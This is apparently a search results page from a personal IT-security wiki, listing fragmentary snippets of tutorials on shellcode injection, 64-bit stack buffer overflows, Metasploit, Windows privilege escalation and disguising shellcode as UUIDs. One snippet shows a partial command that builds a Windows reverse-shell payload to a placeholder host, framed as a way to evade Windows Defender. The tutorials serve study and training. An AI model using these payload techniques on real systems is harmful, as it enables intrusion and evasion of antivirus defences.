Search
You can find the results of your search below.
Fulltext results:
- Shellcode Injection Part 4 @en:it-security:blog
- of ''calc.exe'' on a Windows computer * 64-bit code * Avoid null bytes ===== Preparations ===== =... t from [[https://www.ired.team/offensive-security/code-injection-process-injection/finding-kernel32-base... e used for the structure of the shellcode. ===== Code: Step by step ===== You can also find the complete code on [[https://github.com/psycore8/nosoc-shellcode/
- Buffer overflow in the 64-bit stack - Part 3 @en:it-security:blog
- ssue a system command when calling the function <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Dependencies ===== * socat mod [[... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
- Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog
- 80568|compiled debug binary]] from the blog. <code bash> br *vuln+73 # set breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Dependencies ===== What is needed? ... fer_overflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deactivate ASLR ===== ASLR must also be deactivated
- Obfuscation: Disguise shellcode as UUIDs @en:it-security:blog
- This is usually recognised by Windows Defender. <code bash> python shencode.py create -c="-p windows/x6... T=IPADDRESS LPORT=PORT -f raw -o shell_rev.raw" </code> ==== encode ==== We now encode this payload as UUID strings. <code bash> python shencode.py encode -f shell_rev.raw -u </code> The output now looks something like this: <cod
- Host Discovery with Metasploit database @en:it-security
- se and set up a user with access rights for it. <code bash> root@kali:~# msfdb init Creating database u... g/database.yml Creating initial database schema </code> ===== Metasploit: Connect database ===== <code ruby> msf6 > db_connect user:pass@127.0.0.1/db_name </code> ==== Check connection ==== <code ruby> msf6 >
- Linux Commands Cheatsheet @en:linux
- untuusers.de/Systemzeit/)) ==== show time ==== <code bash> timedatectl </code> ==== change time ==== Set time zone manually <code bash> sudo timedatectl set-timezone Europe/Berlin </code> Select time zone <code bash> sudo dpkg-reconfi
- Privilege escalation: Windows admin thanks to Linux @en:it-security:blog
- ntpw ==== Now we can install ''chntpw'' using: <code bash> sudo apt install chntpw </code> \\ \\ ==== Find Windows partition ==== We are looking for the Windows partition. <code bash> sudo sfdisk -l </code> {{it-security:blog:screenshot_2024-03-14_145734.png|}} \\ \\ In our examp
- 64-Bit Stack CheatSheet @en:it-security
- change them, it must save them on the stack with <code asm>push</code>. Before returning to the function, these registers must then be restored using <code asm>pop</code>. More on this can be found in the Cheat-Sheet((https://cs.br